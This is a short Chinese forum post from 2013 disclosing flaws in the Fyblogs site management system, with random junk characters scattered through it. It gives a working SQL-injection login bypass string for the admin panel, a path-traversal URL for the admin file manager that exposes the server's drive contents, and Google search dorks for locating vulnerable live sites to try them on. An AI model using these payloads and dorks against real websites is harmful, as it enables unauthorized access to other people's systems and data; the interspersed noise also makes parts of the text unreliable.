漏洞类型: 未授权访问/权限绕过
! h. c( J4 w# L' [1 d" ~8 G; C% G0 y, g& e
简要描述:2 F* W' i7 C- r7 H
" x; m" n) ~: t" N1 rFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
* Q1 Y* m7 B7 b* O1 ?' A# L; x9 u$ M) X+ o7 l( g
详细说明:" \9 F$ E) b; [9 Q9 W5 X9 X" _( L6 o2 q
, ^# r, S t; p9 U+ N8 l
后台万能密码 'or'='or'# A+ y4 M: v0 y, G1 Y
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% s% q+ [& `: h7 Q. c! A+ v& |& x1 Zadmin/uploadfile.asp?currentFolder=/upfiles/../
- I; }* k6 v2 c r# \. A! u# u& x: ?
漏洞证明:% C$ ?! k% A6 u6 `$ i
( k0 |% }- M, t4 T谷歌:inurl:type.asp?id=1 新闻中心/ M# J# u! u) w }& U( o- r4 p
或者 :inurl:download_ok.asp?/ }4 ~- }0 ? ~" R5 P" T
) y' M, t g. w% e. s可以测试
7 |3 |1 j! `; U, \3 C6 Q! K" [# Y
" Q( U# f/ S9 Y* O5 M
, N" a# l) ~. x$ G* {5 M |
发表于 2013-3-7 13:07:46
收藏
支持
反对